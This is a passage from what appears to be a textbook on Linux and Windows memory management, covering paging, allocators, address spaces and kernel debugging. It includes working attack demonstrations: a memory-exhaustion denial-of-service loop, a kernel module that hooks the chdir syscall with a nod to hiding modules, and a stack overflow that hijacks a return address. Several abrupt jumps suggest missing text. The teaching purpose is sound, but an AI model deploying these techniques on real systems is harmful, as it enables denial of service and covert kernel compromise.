ing model. I assume that this has been implemented to allow Linux
to seamlessly extend itself to 64-bit architectures. The three-level
paging model is displayed in Figure 2.9.
Figure 2.9
The CR3 control register holds the base address of the page global
directory. The highest-order 10-bit section of the linear address
stores an offset address into the page global directory and is added
to the base address in CR3 to specify a page global directory entry.
This entry holds the base address of a page middle directory. A second
set of linear address bits provides an offset into the page middle
directory, selecting an entry that holds the base address of a page
table. The next 10-bit section of the linear address is an offset into
the page table. This page table entry will specify the base address of
a physical 4KB page of memory. The 12-bit portion of the linear
address is an offset into the physical page and specifies an actual
physical byte of memory.
QUESTION
Wait! Hold on a minute! (At least, I hope this is what you are
thinking.) The Pentium is a 32-bit processor that deals with
32-bit linear addresses. How does Linux resolve this fact?
ANSWER
As it turns out, Linux assumes that the portion of the linear
address that serves as an offset into the page middle directory
consists of zero bits. However, the page middle directory is kept
in the address resolution cycle for the sake of forward compatibil-
ity. It is just that Linux fixes the page middle directory so that it
has a single entry. In the case of the 32-bit Pentium, the page
global directory reverts to the page directory we know from ear-
lier. These adjustments are illustrated in Figure 2.10.
Figure 2.10
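A couple of shifts and masks make the collapsed, 32-bit case concrete. The sample address below is arbitrary:

#include <stdio.h>

void main()
{
    unsigned long linear = 0x080495A4;              /* arbitrary example */
    unsigned long pgd    = (linear >> 22) & 0x3FF;  /* top 10 bits */
    unsigned long pte    = (linear >> 12) & 0x3FF;  /* middle 10 bits */
    unsigned long offset =  linear & 0xFFF;         /* low 12 bits */

    printf("pgd index=%lu, page table index=%lu, offset=0x%03lX\n",
           pgd, pte, offset);
    return;
}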
In the Linux code base, the macros that manipulate the paging data
structures take different forms when the kernel is not running on a
32-bit Pentium.
There is also a significant amount of page metadata that is exter-
nal to Intel’s native paging data structures, which is to say that the
metadata is relevant to Linux without being mandated by the pro-
cessor. For example, Linux allows pages to be locked. A locked page
of memory cannot be written out to disk. Kernel pages are locked.
The kernel also keeps a record of how many processes are using a
particular page of memory. These extra features are supported by
the page structure:
typedef struct page
{
struct list_head list; /* -> Mapping has some page lists.*/
struct address_space *mapping; /* The inode (or ...)
we belong to. */
unsigned long index; /* Our offset within mapping. */
struct page *next_hash; /* Next page sharing our hash bucket
in the pagecache hash table. */
atomic_t count; /* Usage count, see below. */
unsigned long flags; /* atomic flags, some possibly
updated asynchronously */
struct list_head lru; /* Pageout list, eg. active_list;
protected by pagemap_lru_lock!!*/
wait_queue_head_t wait; /* Page locked? Stand in line... */
struct page **pprev_hash; /* Complement to *next_hash. */
struct buffer_head * buffers; /* Buffer maps us to a disk
block. */
void *virtual; /* Kernel virtual address (NULL
if not kmapped, ie. highmem) */
struct zone_struct *zone; /* Memory zone we are in. */
} mem_map_t;
This structure is defined in /usr/src/linux/include/
linux/mm.h. The count member keeps track of how many pro-
cesses are using a page. The count variable is zero if the page is
free. The flags member stores 32 Boolean fields. Its first bit, the
PG_locked field, is used to indicate if a page is locked.
#define PG_locked 0 /* Page is locked. Don't touch. */
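The kernel has its own macros for testing and setting these bits, but the underlying operation is an ordinary bit test. Here is a minimal sketch (the function name is mine):

#define PG_locked 0   /* bit position within the flags word */

/* returns 1 if the PG_locked bit of a page's flags word is set */
int pageIsLocked(unsigned long flags)
{
    return (int)((flags >> PG_locked) & 1);
}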
Memory Allocation
When Linux boots, the kernel reserves a region of physical memory
to store its code and data structures. The pages of memory that
constitute this region are locked and cannot be written to disk. The
remainder of physical memory is referred to
as dynamic memory. Figure 2.11 displays this basic organization of
physical memory.
Figure 2.11
Figure 2.12
The kernel can allocate dynamic memory for itself by invoking one
of three functions:
n unsigned long __get_free_pages(unsigned int
gfp_mask, unsigned int order);
n void * kmalloc (size_t size, int flags);
n static inline void * vmalloc (unsigned long size);
The __get_free_pages() function is defined in /usr/src/
linux/mm/page_alloc.c. It uses the buddy system algorithm
to allocate 2^order pages of contiguous memory. The gfp_mask dic-
tates how the free pages will be looked for. For example, if
gfp_mask is set to __GFP_HIGH, the priority of the memory
request is set to the highest level. There are a whole set of
gfp_mask values in /usr/src/linux/include/linux
/mm.h.
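Here is a sketch of how a kernel component might use this routine, assuming kernel context and the 2.4-era declarations mentioned above; free_pages() is the corresponding release call:

#include <linux/mm.h>

/* allocate 2^2 = 4 contiguous page frames via the buddy system,
   then hand them back */
void demo(void)
{
    unsigned long addr;

    addr = __get_free_pages(GFP_KERNEL, 2);
    if (addr != 0)
    {
        /* ... use the 16KB region starting at addr ... */
        free_pages(addr, 2);
    }
}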
The kmalloc() function is defined in /usr/src/linux
/mm/slab.c and allocates size number of bytes. Instead of a
buddy system algorithm, it uses an approach similar to the slab allo-
cator designed by Sun Microsystems in 1994.
User applications, in contrast, receive their memory when a new
process is created and the sys_fork() system call is made. The sys_fork() function
causes a process address space to be requisitioned from memory for
the user program. A process address space consists of a set of mem-
ory regions in the computer’s linear address space. Each region is a
contiguous set of linear addresses and is assigned a set of access
rights. The size of each memory region is a multiple of 4KB.
Linux user applications traditionally have four memory regions.
One is used to store the application’s machine code, one is used to
store the application’s data, another serves as a stack, and the
fourth region is used as a heap to provide space for run-time storage
requests. The arrangement of these regions in the linear address
space is a function of the development tools that were used to build
the application and operating system’s program loader. For example,
Figure 2.13 displays two different ways to organize memory
regions.
Figure 2.13
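If you want to see where these four regions end up on your own machine, a few address print-outs will do. The layout, and the exact addresses, will vary with the compiler and loader:

#include <stdio.h>
#include <stdlib.h>

int globalDatum = 5;                 /* data region */

void main()                          /* machine code region */
{
    int localDatum = 7;              /* stack region */
    char *dynamic = malloc(32);      /* heap region */

    printf("code  address = %p\n", (void*)main);
    printf("data  address = %p\n", (void*)&globalDatum);
    printf("heap  address = %p\n", (void*)dynamic);
    printf("stack address = %p\n", (void*)&localDatum);
    free(dynamic);
    return;
}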
In the kernel, a process address space is described by the mm_struct structure, shown here in abbreviated form:
struct mm_struct
{
struct vm_area_struct *mmap;  /* list of memory regions */
pgd_t *pgd;                   /* page global directory */
/* ... */
unsigned dumpable:1;
mm_context_t context;         /* architecture-specific MM context */
};
The vm_area_struct structure describes a given memory
region. Because a process address space usually consists of several
memory regions, the mm_struct process address space descriptor
will need to keep a list of vm_area_struct variables. This is
what the mmap member variable is for.
The pgd member variable points to the page global directory
allocated to a process address space. Each process in Linux owns a
single page global directory, and this points to one or more page
tables. Each process also has its own CR3 value. This register’s
contents are saved in the task’s TSS when its corresponding task is
suspended.
The region of the run-time stack that stores the process's command
line arguments is specified by the arg_start and arg_end mem-
ber variables.
Memory Usage
For a system-wide summary of memory usage, use the free
command:
# free
total used free shared buffers cached
Mem: 62200 58916 3284 864 2692 17688
-/+ buffers/cache: 38536 23664
Swap: 96380 9480 86900
Total: 158580 68396 90184
Mem and swap are simply physical memory and disk swap space.
Linux tends to keep things simple, and this is part of its appeal to
me. The data displayed by free is actually an abbreviated version
of what you would get by looking in the kernel’s /proc directory:
# cat /proc/meminfo
total: used: free: shared: buffers: cached:
Mem: 63692800 39899136 23793664 1110016 6172672 15433728
Swap: 98693120 39428096 59265024
MemTotal: 62200 kB
MemFree: 23236 kB
MemShared: 1084 kB
Buffers: 6028 kB
Cached: 8972 kB
SwapCached: 6100 kB
Active: 10664 kB
Inact_dirty: 11208 kB
Inact_clean: 312 kB
Inact_target: 1780 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 62200 kB
LowFree: 23236 kB
SwapTotal: 96380 kB
SwapFree: 57876 kB
NrSwapPages: 14469 pages
The following program lays siege to memory: it allocates a megabyte
at a time and touches every byte of each buffer so that the pages
must actually be committed:
#include <stdio.h>
#include <stdlib.h>   /* malloc() */

void main()
{
unsigned long i;
unsigned long j;
char ch;
unsigned char *ptr;
for(i=0;i<0xFFFFFFFF;i++)
{
printf("malloc(%lu)\n",i);
ptr = malloc(0x100000);
for(j=0;j<0x100000;j++){ ptr[j]=0x7; }
printf("press [enter] key\n");
scanf("%c",&ch);
}
return;
}
The machine I tested this code on had 64MB of DRAM. At about
110MB of allocated virtual memory, my computer’s paging subsys-
tem began to thrash. A few moments later, I lost control of my
machine; I couldn’t even gain the attention of a terminal console to
kill the process. I literally had to unplug my computer. A more insid-
ious version of this program would sleep at odd intervals and only
allocate small bits of memory. This kind of attack tends to creep up
on systems that aren’t being monitored carefully.
Next, I tried the more audacious approach of directly assaulting
the kernel:
/* --brute.c-- */
void main()
{
unsigned char *ptr;
ptr = (unsigned char*)0xC0000000; /* bottom of kernel space (3GB) */
*ptr ='a';
return;
}
Here is the console output that I received:
[root@localhost root]# cc -o brute brute.c
[root@localhost root]# ./brute
Segmentation fault
NOTE Once an LKM has been merged with the kernel’s image, the
LKM’s code runs with the kernel’s privileges. It is a DOS-like situation
where the operating system is
naked. In this state, we can write to any device files we want. This
includes /dev/kmem, the kernel’s coveted memory image. We can
also modify the /proc file system or perhaps hook an internal kernel
function. The potential number of uses is almost infinite. Ba ha ha ha
ha (evil laugh).
LKMs can be loaded/inserted into the kernel at run time with the
following command:
[root@localhost root]# insmod lkm.o
You can verify that the module is resident with the lsmod command:
[root@localhost root]# lsmod
Module Size Used by
lkm 880 0 (unused)
ide-cd 27072 0 (autoclean)
cdrom 28512 0 (autoclean) [ide-cd]
soundcore 4464 0 (autoclean)
binfmt_misc 6416 1
tulip 39232 1
ds 7056 2
yenta_socket 9488 2
pcmcia_core 41600 0 [ds yenta_socket]
autofs 11520 0 (autoclean) (unused)
appletalk 20912 0 (autoclean)
ipx 16448 0 (autoclean)
mousedev 4448 1
hid 19024 0 (unused)
input 3840 0 [mousedev hid]
usb-uhci 21536 0 (unused)
usbcore 51712 1 [hid usb-uhci]
ext3 64624 1
jbd 40992 1 [ext3]
Equivalent results can be obtained via:
[root@localhost root]# cat /proc/modules
This will provide you with a list of currently loaded modules. Natu-
rally, some modules can be written so that they modify the kernel
and are not listed (just a thought). Ba ha ha ha (Neumann laugh).
To remove an LKM from the kernel’s image, you can use the
rmmod command:
[root@localhost root]# rmmod lkm
Note how I did not include the .o suffix as I did with insmod. The
rmmod command will cause the LKM’s cleanup_module()
function to be invoked. You should use this as an opportunity to
restore the system to its previous state.
Here is the LKM itself (in abbreviated form). It hooks the chdir()
system call so that each invocation prints the user ID of the calling
process and the target directory before passing control to the original
system call:
/* --lkm.c-- */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/string.h>
#include <linux/linkage.h>
#include <linux/unistd.h>

extern void *sys_call_table[];

asmlinkage int (*saved_call)(const char *);
asmlinkage int (*getuid_call)(void);

void printStr(char *str)
{
struct tty_struct *my_tty;

my_tty = current->tty;
if (my_tty != NULL)
{
(*(my_tty->driver).write)(my_tty,0,str,strlen(str));
(*(my_tty->driver).write)(my_tty,0,"\015\012",2);
}
return;
}/*end printStr------------------------------------------------*/

asmlinkage int my_call(const char *dir)
{
int uid;
char uid_str[16];

uid = getuid_call();
sprintf(uid_str,"%d",uid);
printStr(uid_str);
printStr((char *)dir);
return saved_call(dir);
}/*end my_call-------------------------------------------------*/
int init_module()
{
printStr("init_module()-start");
saved_call = sys_call_table[__NR_chdir];
sys_call_table[__NR_chdir] = my_call;
getuid_call = sys_call_table[__NR_getuid];
printStr("init_module()-end");
return(0);
}
void cleanup_module()
{
printStr("cleanup()-start");
sys_call_table[__NR_chdir] = saved_call;
printStr("cleanup()-end");
return;
}
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void hijacked()
{
printf("\tYou've been hijacked!\n");
exit(0);
return;
}
void overflow(char *str)
{
char buffer[4];
strcpy(buffer,str);   /* no bounds check: the copy runs past buffer */
return;
}/*end overflow------------------------------------------------*/

void main()
{
char bigbuff[12] = "abcdefgh";   /* room left for the injected address */
void (*fptr)();
unsigned long *lptr;

printf("bigbuff = %s\n",bigbuff);
fptr = hijacked;
lptr = (unsigned long*)(&bigbuff[8]);
*lptr = (unsigned long)fptr;
printf("In main()\n");
overflow(bigbuff);
printf("Back in main()\n");
return;
}
When this program is run, the following output is streamed to the
console:
bigbuff = abcdefgh
In main()
You've been hijacked!
The key to this technique lies in the activation record of the function
to which you are feeding arguments. Figure 2.14 displays the nor-
mal activation record of the overflow() function.
Figure 2.14
Figure 2.15 displays the activation record after the call
overflow(bigbuff) has overwritten the return address with the
address of hijacked().
Figure 2.15
Defending against these kinds of exploits requires constant vigilance.
The people at OpenBSD understand this better than anyone
else (www.openbsd.com). Commercial vendors like Microsoft are so
busy churning out new versions that they cannot invest the time
needed to protect against these types of attacks.
In the Middle Ages, defenders of a fortress could rain arrows and
boiling oil down on attackers. These defenses were very effective,
seeing as how the aggressors typically had nowhere to hide. Having
thick walls didn’t hurt either. Likewise, Linux sysops can do a num-
ber of things to harden their production systems and make attacking
them much more expensive:
Table 2.4
Measure                                         Benefit
Shut down unnecessary services                  Decrease the number of potential targets
Install an intrusion detection system           Detect Trojan horses and compromised binaries
Implement a VPN                                 Foil sniffers
Disable all dial-up servers                     Remove the easy path around your firewall
Place public servers in a demilitarized zone    Limit damage done if public boxes are hacked
Disable zone transfers on DNS servers           Prevent information leakage
Implement password changes/checking             Prevent usage of weak and old passwords
Log data with a dedicated syslog machine        Save forensic evidence in the event of an attack
Enable port scan detection software             Preempt an attack before it happens
Disable NFS and sendmail                        Use SSH and qmail
Establish phone call protocols                  Reduce the risk of social engineering attacks
Install a dedicated firewall (i.e., CheckPoint) Limit/monitor network traffic to the outside
New vulnerabilities are discovered constantly, even on platforms
where the defenders have access to source code. This is why you
will probably want to visit www.securityfocus.com and get on their
bugtraq mailing list. This gives you a way to hear about problems as
they are reported.
Historical Forces
Microsoft’s DOS operating system has never really died off. I have
seen DOS 6.22 books at Barnes & Noble. In fact, you can still buy a
copy of IBM’s PC DOS. This is known as PC DOS 2000, found at
http://www3.ibm.com/software/os/dos.
Unofficially, however, the death knell of DOS was sounded when
Windows 1.0 was released on November 20, 1985. A little over two
years later, Windows 2.0 was released. Windows 2.0 ran on an Intel
80286 in protected mode. The first truly popular version of Win-
dows, 3.1, was presented to the public on April 6, 1992.
In August of 1995, Windows 95 was made available to the public.
It was a major facelift and was completely independent of DOS,
although it did ship with MS-DOS 7.0. Windows 95 supported
advanced features like pre-emptive multitasking and TCP/IP net-
working. Windows 95 also possessed a much more attractive user
interface. It was a smashing success. Microsoft followed Windows
95 with Windows 98, whose success was not as celebrated.
The limitation of Windows 95 and 98 was that they targeted the
average consumer. Windows 95 and 98 both ran a broad spectrum of
desktop applications, but that was about it. The memory protection
was still weak, and they had a tendency to crash, or freeze, when
multiple applications were loaded (I am a voice of experience). In
other words, neither of these operating systems was intended to
run as a business server.
In the early 1990s, Microsoft did not have an industrial-strength,
enterprise level operating system to sell, like UNIX, VMS, or
OS/390. Computers that ran the Windows operating system were
viewed by mainframe vendors as nothing more than embroidered
clients. The high-end system vendors, like IBM and HP, could turn
up their noses and smirk.
“Here’s a nickel, kid. Buy yourself a better computer.”
— UNIX Admin from “Dilbert”
Bill Gates decided that he wanted in; the potential for profit was too
much to resist. So, like any political action committee, he went out
and bought the best that money could buy. He hired Dave Cutler,
the lead architect of Digital Equipment Corporation’s (DEC) VMS
operating system. Cutler also played a pivotal role in the develop-
ment of DEC’s RSX-11 system. Many people don’t know about
Cutler, and he doesn’t get the publicity that someone like Ken
Thompson commands. Nevertheless, hiring Cutler and his small
group of engineers was the best money that Gates ever spent. In
1993, Windows NT 3.1 was released and marked the beginning of
Microsoft’s wildly profitable ascent into the server market.
ASIDE
In 1997, I was hired by an ERP company in the Midwest. I
walked smack into the middle of a major effort to port their 16
million line, middleware code base to Windows NT 4.0. This,
in and of itself, was enough to prove to me that NT was finally
gaining attention. Porting a 16 million line code base is any-
thing but cheap. In fact, it is more like getting married: You
don’t do it unless you are willing to make a significant
long-term commitment.
There were complaints from the engineers undertaking
the port. Their primary gripe was that NT was not a multiuser
system. Microsoft, you see, was espousing a fundamentally
different network model. Instead of having everyone log into
a central machine, Microsoft wanted program components to
be spread out so that applications could take advantage of the
processing power on each machine in the network. This
new paradigm was christened the Distributed Network Archi-
tecture (DNA). It sent some UNIX developers I know into
conniptions.
Figure 2.16
ASIDE
Microsoft has recently announced that it will share the source
code to its .NET tool suite with academic programs through-
out the United States. My guess is that this is a response to
the growing popularity of Linux, which is currently the sys-
tem of choice for research. UNIX gained a strong following
among universities in the 1970s, back when Bell Labs gave its
UNIX source code to computer science departments. These
same 1970s students went out into the marketplace and made
UNIX the dominant high-end player that it is today. The same
could happen with Linux, and I think this scares Microsoft.
On the other hand, what gains a stronghold at universities
does not always gain a foothold in the real world. The RISC
architecture is a darling in many academic programs, but un-
less you are looking at Apple PCs or high-end UNIX servers,
you will be stuck with CISC. CISC is not going to die no matter
what the academics would prefer.
Figure 2.17
For applications that are memory intensive, like databases, there are
versions of Windows (i.e., Windows 2000 Advanced Server and Win-
dows 2000 Datacenter Server) that pack the kernel into the topmost
gigabyte of linear address space so that the applications can have
3GB of linear address space. This feature is enabled via the follow-
ing sort of entry in BOOT.INI:
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows
2000 Advanced Server" /3GB
Figure 2.18
Windows is also able to take advantage of the PAE flag in CR4 that
allows 36 address lines (i.e., 64GB) to be used instead of the normal
32. Naturally, Microsoft had to invent its own acronym so you would
think they had invented it. The facility, in Windows, that allows a
32-bit application to use more than 2GB of physical memory is
known as Address Windowing Extensions (AWE). In order to take
advantage of AWE, one of the core kernel binaries has to be
replaced. Specifically, the Ntoskrnl.exe executable must be
replaced by Ntkrnlpa.exe. AWE is supported by all of the Win-
dows 2000 implementations. It is enabled by the /PAE switch in
BOOT.INI.
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows
2000 Advanced Server" /PAE
You may have noticed a pattern here. Both MMURTL and Linux use this same type of two-ring
scheme so that the paging facilities of the Pentium could provide the
bulk of memory management accounting work. MMURTL and
Linux also make only minimal use of segmentation, seeing as how it
is a somewhat redundant memory partitioning technology. I suspect
that Windows will also eschew an involved segmentation approach
in favor of using paging to divvy up memory. As we will see in the
following section, my suspicions were correct.
The operating system is the only real universally visible con-
struct. Applications might be isolated from each other, each one in
its own private 2GB linear address space, but they all see the oper-
ating system as occupying the upper portion of memory. Figure
2.19 displays the most common topography of the operating sys-
tem’s components.
Figure 2.19
Some of the regions in Figure 2.19 are not exact in terms of their
starting and stopping range because some components of the oper-
ating system address space are dynamic. The really important thing
to take from Figure 2.19 is that the kernel’s machine instructions
are secluded in the basement of the operating system’s linear
address space. The remaining space is taken up by data structures
of one form or another.
Table 2.5
Macro          Meaning
KGDT_NULL      Null selector (points to the vacant entry at the start of the GDT)
KGDT_R0_CODE   Selector to the kernel code segment descriptor
KGDT_R0_DATA   Selector to the kernel stack segment descriptor
KGDT_R3_CODE   Selector to the user code segment descriptor
KGDT_R3_DATA   Selector to the user stack/data segment descriptor
KGDT_TSS       Selector to the segment descriptor storing the TSS (multitasking)
KGDT_R0_PCR    Selector to the segment containing the Process Control Region
KGDT_R3_TEB    Selector to the segment containing the Thread Environment Block
KGDT_VDM_TILE  Selector to the segment containing the DOS virtual machine
KGDT_LDT       Selector to the segment containing the LDT
WinDbg is a Win32 GUI program that can be used to look at both kernel mode
and user mode code. KD, Kernel Debugger, is the console equivalent
of WinDbg. KD comes in three flavors: I386KD.EXE,
ALPHAKD.EXE, and IA64KD.EXE. I am assuming that you are on
a Pentium machine, so the one you would need to use is
I386KD.EXE.
Debugging a live kernel typically requires a special setup. A tar-
get machine, which is running the kernel under scrutiny, is
connected by a NULL modem to a host machine. The kernel
debugger lives on the host machine so that it can watch the kernel
without becoming part of the action if the target machine becomes
unstable. A NULL modem is just a special kind of serial cable. This
target-host machine installation is illustrated in Figure 2.20.
Figure 2.20
If you don’t have access to a second machine, you can still use a
kernel debugger to look under the hood. However, in this case, the
kernel will be dead. Specifically, you will need to crash your Win-
dows computer so that it dumps an image of memory to disk. This
is exactly what happens when the infamous “Blue Screen of Death”
(BSOD) appears. There are several types of memory dumps that
can be performed:
n Complete memory dump
n Kernel memory dump
n Small memory dump
A memory dump is the snapshot of a system when it died. A com-
plete memory dump makes sure that everything but the kitchen
sink ends up in the dump file. A kernel memory dump limits its con-
tents to the kernel code and data. The small memory dump is a
64KB file containing a minimal amount of system status
information.
To specify the type of memory dump that you want the kernel to
write to disk during a crash, open the Windows Control Panel and
double-click on the System icon. Select the Advanced tab and click
on the Startup and Recovery button. The dialog box that should
appear is displayed in Figure 2.21.
Figure 2.21
NOTE You will need to make sure that you have the latest kernel
symbols installed on your computer. These allow the debugger to map
kernel symbols to addresses. It is important to make sure that you
have the correct version of symbols too. If your kernel is build 2195
SP 2 (Service Pack 2), you will need symbols for build 2195 SP 2.
You can determine your build and service pack number by opening
the Windows Control Panel and clicking on the System icon. The panel
marked General should specify the version status of your Windows
installation. If your symbols are the wrong version or the debugger
cannot find them, the kernel debugger will display an error message
having to do with checksums or missing files. I spent several very frus-
trating hours figuring this out one particular Saturday.
Finally, you will need to set the _NT_SYMBOL_PATH environmental
variable to the directory containing your symbol files (i.e., e:\winnt\
symbols). The kernel debugger will use this variable to find the sym-
bol files at run time.
Once I had the kernel’s state loaded up, I examined the GDTR reg-
ister. This stores the base linear address and limit of the GDT. The
debugger views GDTR in terms of two smaller registers (GDTR
and GDTL). The r command is used to view the contents of
registers:
kd> r gdtr
r gdtr
gdtr=80036000
kd> r gdtl
r gdtl
gdtl=000003ff
This told me that the GDT resides at linear address 0x80036000
and that its limit is 0x3FF. Because the limit is the offset of the
table's last byte, the GDT occupies 1,024 bytes, enough for 128
64-bit entries. I used the dump command to look at the actual GDT entries:
kd> d 80036000
d 80036000
80036000 00 00 00 00 00 00 00 00-ff ff 00 00 00 9b cf 00 ................
80036010 ff ff 00 00 00 93 cf 00-ff ff 00 00 00 fb cf 00 ................
80036020 ff ff 00 00 00 f3 cf 00-ab 20 00 20 24 8b 00 80 ......... . $...
80036030 01 00 00 f0 df 93 c0 ff-ff 0f 00 00 00 f3 40 00 ..............@.
80036040 ff ff 00 04 00 f2 00 00-00 00 00 00 00 00 00 00 ................
80036050 68 00 80 34 47 89 00 80-68 00 e8 34 47 89 00 80 h..4G...h..4G...
80036060 ff ff c0 2a 02 93 00 00-ff 3f 00 80 0b 92 00 00 ...*.....?......
80036070 ff 03 00 70 ff 92 00 ff-ff ff 00 00 40 9a 00 80 ...p........@...
kd>
After that, it was just a matter of sifting through 64-bit length strips
of memory. What I came up with was a list of 25 live segment
descriptors. The rest were vacant (i.e., the present flag was
cleared). Given that a GDT is capable of storing 8,192 64-bit entries,
Windows is only using a very small fraction of the possible total
entries.
Kernel Segment Descriptors (Privilege = 0)
--------------------------
0000 Bas=00000000 Lim=00000000 Bytes DPL=0 NP
0008 Bas=00000000 Lim=000fffff Pages DPL=0 P Code RE A
0010 Bas=00000000 Lim=000fffff Pages DPL=0 P Data RW A
0030 Bas=ffdff000 Lim=00000001 Pages DPL=0 P Data RW A
0060 Bas=00022ac0 Lim=0000ffff Bytes DPL=0 P Data RW A
0068 Bas=000b8000 Lim=00003fff Bytes DPL=0 P Data RW
0070 Bas=ffff7000 Lim=000003ff Bytes DPL=0 P Data RW
0078 Bas=80400000 Lim=0000ffff Bytes DPL=0 P Code RE
0080 Bas=80400000 Lim=0000ffff Bytes DPL=0 P Data RW
0088 Bas=00000000 Lim=00000000 Bytes DPL=0 P Data RW
00e0 Bas=f7050000 Lim=0000ffff Bytes DPL=0 P Code RE A
00e8 Bas=00000000 Lim=0000ffff Bytes DPL=0 P Data RW
00f0 Bas=8042df4c Lim=000003b7 Bytes DPL=0 P Code EO
00f8 Bas=00000000 Lim=0000ffff Bytes DPL=0 P Data RW
0100 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
0108 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
0110 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
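Sifting through those 64-bit strips is mostly a matter of shifting and masking. The following sketch (my own helper functions, not part of any debugger) decodes the base address and limit of a raw 8-byte descriptor, using the second entry from the dump above as a test case:

#include <stdio.h>

/* byte layout: [limit 0-15][base 0-15][base 16-23][flags][limit 16-19 + flags][base 24-31] */
unsigned long descBase(unsigned char d[8])
{
    return (unsigned long)d[2] | ((unsigned long)d[3] << 8) |
           ((unsigned long)d[4] << 16) | ((unsigned long)d[7] << 24);
}

unsigned long descLimit(unsigned char d[8])
{
    return (unsigned long)d[0] | ((unsigned long)d[1] << 8) |
           (((unsigned long)d[6] & 0x0F) << 16);
}

void main()
{
    /* selector 0008 from the dump: ff ff 00 00 00 9b cf 00 */
    unsigned char kernelCode[8] = {0xff,0xff,0x00,0x00,0x00,0x9b,0xcf,0x00};

    printf("Bas=%08lx Lim=%05lx\n",
           descBase(kernelCode), descLimit(kernelCode));
    return;
}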
Linear Address Space Taxonomy
The memory that constitutes the linear address space of a user
application can be classified as one of three different species:
n Free
n Reserved
n Committed
Free memory is not being used by an application. To understand
reserved and committed memory, it is helpful to use a restaurant
analogy. When you call a restaurant and reserve a table, you are not
actually sitting at the table, but you know it will be there when you
need it. Not until you walk into the restaurant and sit down have
you made a commitment to spend money.
Likewise, reserved memory is nothing more than a range of linear
addresses that has been set aside for future use. Trying to access
linear memory that is reserved produces a page fault because no
physical memory has been allocated yet. Committed memory is a
range of linear addresses for which physical storage in memory or
on disk has been allocated. This two-phase commit, to borrow a
phrase from transaction theory, allows memory to be reserved long
before any physical storage is actually consumed. This
approach, which delays physical memory allocation until the last
minute, belongs to a school of algorithms known as lazy evaluation.
The concepts of reserved and committed memory are reflected
in the Win32 API. Specifically, there is a function called Virtual-
Alloc() that allows memory to be reserved or committed.
Given that allocation of linear address regions consists of two
phases, it only makes sense that the freeing of linear memory is
also comprised of two phases. Linear memory is de-committed so
that the memory region has reverted to the reserved state, and then
it is released. VirtualFree() is a Win32 API function that pro-
vides this mechanism to user applications.
Consider the following example:
#include<windows.h>
#include<stdio.h>
void main()
{
long *ptr;
unsigned long nbytes = 1024;
ptr = (long*)VirtualAlloc(NULL,nbytes,MEM_RESERVE,PAGE_READWRITE);
/*
memory is reserved: this will cause application to crash
ptr[64]='a';
*/
VirtualAlloc(ptr,nbytes,MEM_COMMIT,PAGE_READWRITE);
ptr[64]='a';
VirtualFree(ptr,nbytes,MEM_DECOMMIT);
/*
memory is reserved: this will cause application to crash
ptr[64]='a';
*/
VirtualFree(ptr,0,MEM_RELEASE); /* size must be 0 with MEM_RELEASE */
return;
}
If memory is accessed while it is in the reserved state, the applica-
tion will crash. You can re-insert the code that has been commented
out to prove this to yourself.
As with Linux, pages of memory can be locked. User programs
can use the VirtualLock() and VirtualUnlock() functions
to request that a region of linear memory is locked. However, the
kernel is free to ignore this request. The only way to guarantee
that a region of linear memory is locked is to invoke kernel mode
functions like MmLockPageableCodeSection() and MmLock-
PageableDataSection(). Unfortunately, these calls are
internal to the kernel and normally cannot be invoked from user
space.
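Here is a minimal sketch of the user mode calls. Keep in mind that the kernel treats VirtualLock() as a request rather than a command:

#include <windows.h>
#include <stdio.h>

void main()
{
    SIZE_T nbytes = 4096;
    char *ptr;

    ptr = (char*)VirtualAlloc(NULL, nbytes, MEM_COMMIT, PAGE_READWRITE);
    if (ptr == NULL) { printf("no memory\n"); return; }

    if (VirtualLock(ptr, nbytes))      /* ask that the region stay resident */
    {
        ptr[0] = 'a';                  /* work on data that should not page out */
        VirtualUnlock(ptr, nbytes);
    }
    VirtualFree(ptr, 0, MEM_RELEASE);  /* size must be 0 with MEM_RELEASE */
    return;
}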
The pages that a process keeps resident in physical memory are
known as its working set; the kernel's resident pages likewise form
the system working set. To make efficient use of physical memory,
Windows tracks the number of pages allocated to each working set
and can expand or trim the number of page frames allotted. The
default minimum and maximum working set sizes are depicted in
Table 2.6.
Table 2.6
Physical DRAM Available Default Minimum Default Maximum
Less than 20MB 20 pages 45 pages
20-32MB 30 pages 145 pages
More than 32MB 50 pages 345 pages
ModifiedNoWrite: 0 ( 0 kb)
Active/Valid: 19109 ( 76436 kb)
Transition: 0 ( 0 kb)
Unknown: 0 ( 0 kb)
TOTAL: 32767 (131068 kb)
As you can see, there are eight different types of page states. These
types are enumerated and explained in Table 2.7.
Table 2.7
Page Frame Type  Meaning
Zeroed           Page is free and initialized with zero values
Free             Page is free but is uninitialized (stores garbage bytes)
Standby          Recently removed from a working set, and was not modified while in the set
Modified         Recently removed from a working set, and was modified while in the set
ModifiedNoWrite  Like a "modified" page, but will not be written to disk
Active/Valid     Page is part of a current working set
Transition       Page is in digital purgatory between the disk and physical memory
Unknown          Danger! Bad page frame; has caused hardware errors
Memory Protection
Given Windows’ rather minimal use of segmentation, I suspect that
page faults provide the core memory protection mechanism.
Remember that Windows has only two rings of privilege (kernel
mode and user mode). This fits perfectly with the Supervisor/User
privilege scheme that Intel paging supports. As with Linux and
MMURTL, when a user program attempts to access memory
belonging to the kernel, a page fault is generated and passed on to
Windows to do what it sees fit. Typically, this means halting the pro-
gram that caused the page fault.
The nature of the page directory and page table bookkeeping also
serves to keep one process from accessing physical memory being
used by another process. Each process in Windows is supplied with
its own page directory. This ensures that the linear address space
used by the process will map to a unique physical address space.
This is particularly important because Windows places each process
in an identical linear address space.
The additional protection supplied by the page table entry
read/write flag, discussed in Chapter 1, is reflected in the Win32
API. Take a look at the call to VirtualAlloc() that was made in
a previous example:
ptr = (long*)VirtualAlloc(NULL,nbytes,MEM_RESERVE,
PAGE_READWRITE);
The last argument is a memory access specifier. This specifier can
be one of the eight macros enumerated in Table 2.8.
Table 2.8
Macro Meaning
PAGE_READONLY Page region can only be read
PAGE_READWRITE Page region can be read and written to
PAGE_EXECUTE Page region can be executed
PAGE_EXECUTE_READ Page region can be read and executed
PAGE_EXECUTE_READWRITE Page region can be read, executed, and written to
PAGE_GUARD Access raises a STATUS_GUARD_PAGE exception
